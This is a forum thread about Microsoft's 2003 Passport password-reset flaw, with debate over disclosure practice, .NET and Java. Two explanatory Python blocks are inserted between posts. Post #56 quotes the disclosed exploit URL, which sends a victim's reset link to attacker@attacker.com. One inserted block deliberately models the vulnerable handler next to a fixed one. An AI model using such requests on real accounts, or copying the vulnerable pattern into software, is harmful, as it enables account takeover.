Microsoft Admits Passport Security Flaw

  • #46
    Originally posted by Gatekeeper
    A little bit more diversity in the world of computer operating systems would make incidents like this not as widespread or as potentially destructive, IMO.

    Gatekeeper
    A little more diversity in the world of computer operating systems would lead to increased development costs, bug counts, and complications, since there's a wide variety of OSes the software interfaces with.

    Of course, others would argue it'd be fine to just make a simple "standard" (like a POSIX on steroids), and have a bunch of programs interface with it.

    If we did that, it'd stifle progress and innovation.
    "The issue is there are still many people out there that use religion as a crutch for bigotry and hate. Like Ben."
    Ben Kenobi: "That means I'm doing something right. "



    • #47
      Originally posted by BustaMike
      They did patch it really quick for sure. The thing is that the security hole was caused by simply entering a value into the URL to take over someone's account if I'm not mistaken. This seems really dumb. The system should have been designed with better security than that.
      No kidding, but you'll find that the hardest mistakes to catch in programming are the really dumb ones.

      This bug in particular would have never been caught by using MS' /GS compile flag, checking buffer overflows, or by examining logic and permissions. Somebody forgot a simple 'if' somewhere which qualified where the host came from.

      It's like FG said, stuff like that sometimes slips out and you don't know it's broken until someone finds out about it.


      • #48
        Originally posted by faded glory
      Have any of you guys ever programmed? I mess with VB and I have a hell of a time putting together a program with more than 2 forms and 500 lines of code.
        This speaks more to your level of skill than the complexity of commercial grade programming. Somehow, when you talk about two forms and 500 lines of code, I have a vision of you putting all that code in the initial form's open method.

        Let alone a friggin' thing like .net. **** happens. It's nobody's fault; software security is a lot like airline safety. It's a policy written with blood. You don't know something's wrong till it happens.
        .net only has a couple of really problematic areas (garbage collection and workarounds for deterministic finalization of objects being one) and has a years long history of development (it's COM+ under a new name), a huge staff, and a huge development budget.

        Software security is a matter of testing and consistent application of sound practices. The problem with this is not how quickly or how it was caught, but that it was a very basic human error type of lapse.
        When all else fails, blame brown people. | Hire a teen, while they still know it all. | Trump-Palin 2016. "You're fired." "I quit."



        • #49
          MtG: Have you had a chance to use .NET Framework 1.1 yet?

          I've not yet (still on VS.NET 2002 and .NET 1.0), but the changelogs I've read said that garbage collection and performance in general has been improved.


          • #50
            Originally posted by Asher

            Somebody forgot a simple 'if' somewhere which qualified where the host came from.
            And "Then" and probably "Or Else"

            It's like FG said, stuff like that sometimes slips out and you don't know it's broken until someone finds out about it.
            Exactly. You get it.


            We all care about the opinions of gas-pumpers, Steverino
            Why does that still stick? I was totally razzling him back in the day. Oh, what I would do to see that thread again. And my n00bish antics.

            This speaks more to your level of skill than the complexity of commercial grade programming. Somehow, when you talk about two forms and 500 lines of code, I have a vision of you putting all that code in the initial form's open method.
            Blah blah... I threw it out as an example. Total number of programs Steve has tried to write: 10. Total number of programs Steve has gotten to work: 0. Total number of programs Steve is trying to figure out: 3. Total number of dynamic arrays Steve is trying to figure out this weekend: 3. Steve doesn't understand database libraries very well.


            anyway

            .net only has a couple of really problematic areas (garbage collection and workarounds for deterministic finalization of objects being one) and has a years long history of development (it's COM+ under a new name), a huge staff, and a huge development budget.
            .net is a good idea. It makes things a helluvalot easier. I wish everybody was .net

            Software security is a matter of testing and consistent application of sound practices. The problem with this is not how quickly or how it was caught, but that it was a very basic human error type of lapse
            The problem is, this stuff isn't picked up in Debug or with whatever standard tools MS uses. So all the testing in the world STILL won't fix everything.



            • #51
              Actually that last one didn't make any sense cuz my text GOT EATEN!!!!!!!!!

              I'm not retyping it.

              Err... a lot of it.


              • #52
                Originally posted by Asher
                MtG: Have you had a chance to use .NET Framework 1.1 yet?

                I've not yet (still on VS.NET 2002 and .NET 1.0), but the changelogs I've read said that garbage collection and performance in general has been improved.
                I haven't yet. I have a fairly big project in development now, and I don't want to change while in development without evaluating the differences first. Right now, I don't have the luxury of spare boxes just to test the differences, because Bush's war and the spike in fuel prices delayed the development money I'm getting from my client.

                Garbage collection is a bit too random as far as when it occurs in .NET 1.0, and I have a lot of high-end resources to release (DB connections and sockets, including SSL sockets, in particular), so I've been in the habit of forcing dereferenced objects to be GC'd explicitly.

                It would be great if there was a way to specify by property your desired priorities for objects or classes to be checked for GC, or if you could control the frequency, but I'll take any improvement I can get in it.


                • #53
                  It seems in this case Microsoft reacted really quick. I would give them a thumbs-up, except that I never could be arsed to open a passport account at all, so I don't care.

                  Asher - in my books you are a rightwinger at the very least. Not that this would be a reason to insult you, though.



                  • #54
                    I consider myself a right-winger, too, but I still am very socially liberal.

                    Gay equal rights, public healthcare, welfare, public transportation, pro-choice, etc.


                    • #55
                      Originally posted by faded glory
                      Why does that still stick? I was totally razzling him back in the day. Oh what I would do to see that thread again. And my n00bish antics.
                      Some things just fit.

                      Blah blah... I threw it out as an example. Total number of programs Steve has tried to write: 10. Total number of programs Steve has gotten to work: 0. Total number of programs Steve is trying to figure out: 3. Total number of dynamic arrays Steve is trying to figure out this weekend: 3. Steve doesn't understand database libraries very well.
                      Dynarrays in VB 6, or VB .NET? Are you using ADO, or just calling local MDB files?

                      The problem is. This stuff isnt picked up in Debug or with whatever standard tools MS uses. So all the testing in the world STILL wont fix everything.
                      Logic problems are never picked up with coding tools. I have a large commercial app suite I'm working on, that among other things, grants various levels of access to many parties (lenders, owners, customers, management auditors, maintenance pukes, accounting people, etc.), inside and outside the enterprise owner. Depending on who you are and your level of access with a particular project, you can remotely shut down a powerplant in the middle of summer, or adjust a bill for a six-figure amount, or examine maintenance history. (A big deal if there's a multimillion dollar warranty claim.) You can also demote administrators, etc. Depending on who you are, you can have entirely different roles on different projects, which are open-ended - there can be a hundred of them.

                      All the various auth/auth stuff I do can be code checked with tools, but the logical choices of who has what permissions have to be checked by hand against my code spec and design documents. As does the process of making sure, on all parts of the databases, that whatever is not explicitly permitted is denied. In the development phase, I can do that by hand because I have just a few test databases, but in the commercial release, I have to write a custom tool just to do that sort of permissions setup, and to verify that permissions are set accurately. I get my ass sued into the ground if I screw up. So yes, it can be done.
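The kind of permissions tool MtG describes in the post above, as an added example that is not MtG's code and not part of the thread: a default-deny authorization check over a role-per-project model, plus an audit that parses the GRANT statements actually present in a database and reports what must be revoked or applied to match the spec. The roles (lender, owner, maint, auditor), the tables, the projects and the GRANT dump are all constructed for illustration.

```python
"""Added example (not from the thread): default-deny authorization and a
permissions audit.  Spec, assignments and the GRANT dump are constructed."""
import re

# Specification: the complete set of (role, table, privilege) grants that may
# exist.  Anything not listed here is denied, whatever the database says.
SPEC = {
    ("lender",  "bills",         "SELECT"),
    ("owner",   "bills",         "SELECT"),
    ("owner",   "bills",         "UPDATE"),
    ("owner",   "plant_control", "EXECUTE"),
    ("maint",   "maint_history", "SELECT"),
    ("auditor", "bills",         "SELECT"),
}

# A principal can hold a different role on every project (assumed layout).
ASSIGNMENTS = {
    "alice": {"plant-7": "owner", "plant-9": "lender"},
    "bob":   {"plant-7": "maint"},
}

# Constructed dump of the grants actually present in a test database.
SAMPLE_DUMP = """
-- grants as deployed
GRANT SELECT ON bills TO lender;
GRANT SELECT, UPDATE ON bills TO owner;
GRANT SELECT ON maint_history TO maint;
GRANT UPDATE ON bills TO maint;  -- not in the spec: must be revoked
"""

GRANT_RE = re.compile(
    r"^\s*GRANT\s+([\w\s,]+?)\s+ON\s+(\w+)\s+TO\s+(\w+)\s*;?\s*$", re.I
)


def is_permitted(user, project, table, privilege,
                 spec=SPEC, assignments=ASSIGNMENTS):
    """Default deny: no assignment on the project, or an assignment whose
    role lacks the grant in the spec, both yield False."""
    role = assignments.get(user, {}).get(project)
    if role is None:
        return False
    return (role, table.lower(), privilege.upper()) in spec


def parse_grants(sql_text):
    """Turn GRANT statements into the same (role, table, privilege) tuples
    the spec uses; SQL comments and non-GRANT lines are ignored."""
    grants = set()
    for raw in sql_text.splitlines():
        line = raw.split("--", 1)[0]
        m = GRANT_RE.match(line)
        if not m:
            continue
        privileges, table, role = m.groups()
        for p in privileges.split(","):
            grants.add((role.lower(), table.lower(), p.strip().upper()))
    return grants


def reconcile(spec, deployed):
    """Return (revoke, grant) statement lists that bring the database in line
    with the spec.  Extra grants are the dangerous direction, so they are
    listed first; a missing grant only makes a legitimate user get denied."""
    revoke = [f"REVOKE {p} ON {t} FROM {r};"
              for r, t, p in sorted(deployed - spec)]
    grant = [f"GRANT {p} ON {t} TO {r};"
             for r, t, p in sorted(spec - deployed)]
    return revoke, grant


if __name__ == "__main__":
    revoke, grant = reconcile(SPEC, parse_grants(SAMPLE_DUMP))
    print("\n".join(revoke + grant))
```

The point of keeping the spec as data rather than as code is that the same set drives both the runtime check and the audit, so the "checked by hand against the design documents" step happens once, against one file, and the tool does the comparison against every database.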


                      • #56
                        Originally posted by Asher
                        What they also don't mention in the article is the guy sent e-mails to MS departments completely unrelated to software security.

                        There are official channels for this kind of information, mass-mailing them to stuff like pr@microsoft.com doesn't get you anywhere.

                        http://news.com.com/2100-1002-1000429.html?tag=nl

                        quote:
                        However, he didn't send an e-mail to Microsoft's standard security contact point, secure@microsoft.com.
                        When you're quoting an article you should quote the whole paragraph and not a phrase out of context:

                        The security consultant also said that he had repeatedly sent e-mail warnings to Microsoft's abuse and security addresses at Hotmail.com to no avail. However, he didn't send an e-mail to Microsoft's standard security contact point, secure@microsoft.com.
                        No way; trying to contact abuse@hotmail.com for a Hotmail (and Passport) vulnerability and being answered by an NLP bot is not the same as trying to warn pr@microsoft.com.

                        Originally posted by Asher
                        MS found out about it from a C|Net story on it, which the "honourable" hacker leaked to the public so anyone could exploit it.
                        I hope for Microsoft that they really didn't find the story on C|Net...
                        The author made his post on bugtraq, a well-known security mailing list, and Microsoft probably read it there (are you trying to defend MS or to insult it?)

                        About the leak to the public:
                        It is called open-disclosure and is what forces a lot of companies to fix bugs quickly, you start sending mails to the company warning them about the bug you've discovered and if they don't answer you, you simply submit it to a security mailing-list.
                        It was invented because someone discovered that when the vulnerability was public the company was able to fix it in a couple of hours, while when it wasn't the company took months just to answer the mail.
                        It happens for Microsoft, Adobe, RedHat, Oracle, Mandrake... etc, it's not just an anti-MS invention.

                        Originally posted by Asher
                        1) didn't allow enough time for employees to forward the message seeing as it was 8pm,
                        From the original post to bugtraq:

                        Vulnerability / Flaw discovered : 12th April 2003
                        Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)

                        He had been waiting for an answer since 12th April; he didn't send two mails, one to Hotmail and one to bugtraq, the same day!

                        Originally posted by Asher
                        They did fix it, 3 hours after they found out about it, it was patched...
                        You see that open-disclosure works?

                        Originally posted by Asher
                        Or are you saying they should've known it existed? In that, case, of course that'd be nice. But when you produce as much software as MS, and have so many people constantly trying to break it, things happen.
                        I totally agree with you on this in general, but in this case I can't; this is from the post to bugtraq:

                        All you got to do is hit the following in your browser:

                        https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

                        And you’ll get an email on attacker@attacker.com asking you to click on a url something like this:

                        http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033

                        From that url, you can reset the password and I don’t think I need to say anything more about it.

                        Now, how the hell did they leave prefem accepting any email address? It's not like a buffer overflow; it's a giant conceptual mistake, and done on Passport, not on Age of Empires!

                        Originally posted by Asher
                        Of course, others would argue it'd be fine to just make a simple "standard" (like a POSIX on steroids), and have a bunch of programs interface with it.
                        What about .NET? I really like it.

                        BTW, I'm not against MS; their security policy is good enough (especially compared with that of other companies like Adobe, for example) and the huge quantity of bugs found in its products is due to the quantity of code that they write.
                        "If it works, it's obsolete."
                        -- Marshall McLuhan

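The request in the bugtraq excerpt quoted above, modelled as an added example that is not code from the thread, from the bugtraq post, or from Microsoft. The query names `em` and `prefem` and the shape of the EmailPage link come from the quoted URLs; the account table, the token format, the fifteen-minute lifetime and the mail "outbox" are assumptions for illustration. `reset_vulnerable` reproduces the described behaviour (the link goes wherever `prefem` points); `reset_fixed` never reads a destination from the request at all, which is the actual fix: there is no value of `prefem` that should be accepted, so there is nothing to validate. The hardened version also returns the same response whether or not the account exists, and `redeem` shows the second half of the flow with a single-use, expiring token.

```python
"""Added example (not from the thread, bugtraq or Microsoft): a model of the
Passport-style reset flow.  Parameter names em/prefem come from the quoted
URL; everything else (accounts, token format, link, TTL) is assumed."""
import hashlib
import secrets
import time
from urllib.parse import parse_qs, urlsplit

TOKEN_TTL_SECONDS = 15 * 60          # assumed lifetime of a reset link
RESET_LINK = "https://register.passport.net/EmailPage.srf?EmailID={}&URLNum=0&lc=1033"

ACCOUNTS = {"victim@hotmail.com": {"password_hash": None}}   # constructed
OUTBOX = []    # (recipient, link): stands in for the mail system
ISSUED = {}    # token -> (account, expiry)


def query_params(url):
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def issue_token(account, now):
    token = secrets.token_urlsafe(32)          # 256 bits, unguessable
    ISSUED[token] = (account, now + TOKEN_TTL_SECONDS)
    return token


def reset_vulnerable(url, now=None):
    """The flaw as described: the link is mailed to whatever address the
    request names in prefem, so an attacker simply names their own mailbox."""
    now = time.time() if now is None else now
    p = query_params(url)
    account = p.get("em", "")
    if account not in ACCOUNTS:
        return "no such account"              # also leaks account existence
    recipient = p.get("prefem") or account    # trusting client input
    OUTBOX.append((recipient, RESET_LINK.format(issue_token(account, now))))
    return "sent"


def reset_fixed(url, now=None):
    """Hardened: the destination is never taken from the request; the link
    goes only to the address on file, and the response is identical whether
    or not the account exists, so it cannot be used to enumerate accounts."""
    now = time.time() if now is None else now
    account = query_params(url).get("em", "")
    if account in ACCOUNTS:
        OUTBOX.append((account, RESET_LINK.format(issue_token(account, now))))
    return "if that account exists, a reset message has been sent"


def redeem(token, new_password, now=None):
    """Second half of the flow: a token is single-use and expires."""
    now = time.time() if now is None else now
    entry = ISSUED.pop(token, None)           # pop first: one use only
    if entry is None:
        return False
    account, expiry = entry
    if now > expiry:
        return False
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, 200_000)
    ACCOUNTS[account]["password_hash"] = salt.hex() + ":" + digest.hex()
    return True


if __name__ == "__main__":
    attack = ("https://register.passport.net/emailpwdreset.srf?lc=1033"
              "&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1")
    reset_vulnerable(attack)
    reset_fixed(attack)
    for recipient, link in OUTBOX:
        print(recipient, "<-", link)
```

Note that a 'prefem' check of the form "only accept addresses that match em" would have closed this particular hole, but the safer shape is the one above: the server already knows where the account's mail goes, so the request should carry nothing but the account identifier.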


                        • #57
                          Originally posted by Asher
                          They did fix it, 3 hours after they found out about it, it was patched...
                          Ah, after the researcher sent 10 e-mails to MS without a response.

                          Originally posted by Asher
                          Or are you saying they should've known it existed? In that, case, of course that'd be nice. But when you produce as much software as MS, and have so many people constantly trying to break it, things happen.
                          So much for "Trustworthy Computing." This wasn't even an obscure hole. It was pathetic programming to begin with.
                          (\__/) 07/07/1937 - Never forget
                          (='.'=) "Claims demand evidence; extraordinary claims demand extraordinary evidence." -- Carl Sagan
                          (")_(") "Starting the fire from within."



                          • #58
                            Maybe, but .NET still beats the **** out of anything else out there.

                            Luckily for Sun, Java is now a standard for the US military, who is upgrading systems by porting non-OOP Ada and other legacy spaghetti code base to a non-objectified approach using Java spaghetti code.
                            Last edited by MichaeltheGreat; May 10, 2003, 11:43.


                            • #59
                              I have not used .NET so I can't tell, but if it's just repackaged COM, I would have to say ORB/CORBA is a better architecture. You can't really compare .NET and Java though, because .NET is about "Web services" (whatever that means) and Java is about portable, write-once run-many, code.


                              • #60
                                .NET is both broader and more advanced than COM in several ways. Although M$ originally was going to call it COM+, it made sense to rename it, as the similarity to COM is minimal.

                                "Web services" are just a small aspect of .NET - there's really no reason not to use it for standard desktop applications, n-tier, or web apps. J2EE also addresses web services, which really are (IMO) still at the stage of being a solution looking for a problem. .NET is much more about being a cross-platform capable operating environment, without being dependent on "The mother of all languages" nonsense.

                                Java is hardly a panacea - it's lots of fun to want to make use of features in 1.3 or 1.4, while knowing some of the devices you want to support only have 1.1 or 1.2 compatible JVMs. Java still has its place - I wouldn't try writing game apps for my Nextel phone in .NET for another year or two.

                                Not to mention that Java does its "one size (almost, usually, well, more often than not) fits (almost, some of the time) all" by compromising both on speed and on implementation. GUI elements in Java on Windows suck compared to native Windows elements, regardless of whether you use the M$ or Sun JVMs. Java interoperability with languages like C++ is problematic, and sometimes just painful.

                                .NET does a lot of things for you:

                                It frees you from DLL-hell by providing excellent versioning tools. Each app can specify versioning behavior of its components by default global behavior, at the app level, or at the level of each component. Automatic updating via remote server is easy, and won't break anything else, even if the components being updated reside in the global assembly cache.

                                Inheritance and other OOP features and memory management is fully supported in all .NET compliant languages, including stuff like COBOL.

                                Objects written in one .NET compliant language are seamlessly compatible in all respects with objects written in any other .NET compliant language, so you can program in your preferred language or use the language tool best adapted to what you're doing. You also no longer have to care what language 3rd-party components or assemblies are written in, there are no compatibility issues.

                                Dependence on the Windows registry and Win32 API calls is completely eliminated, so all .NET apps are fully compatible with all Win versions, if they're running the .NET framework.

                                Assemblies can reside privately to the application, or globally, or any mixture, and the delivered app automatically finds the right ones.

                                Memory leaks are eliminated by garbage collection, which can be invoked manually.

                                The independence from Win32API and the registry, plus the specs of the MS Intermediate Language will allow development of non-Windows .NET frameworks, giving platform independence a la the JVM, but with a lot more optimization.

                                Depending on the device restrictions you have to deal with and any specific requirements you have, .NET apps and assemblies all originally compile by a JITter, but you can either have the app or assembly continue with JIT behavior, or just do it the first time and run the precompiled app every subsequent time.

                                Oh, and it's backwards compatible with COM. Even COM objects that couldn't talk to each other in DCOM work seamlessly together in .NET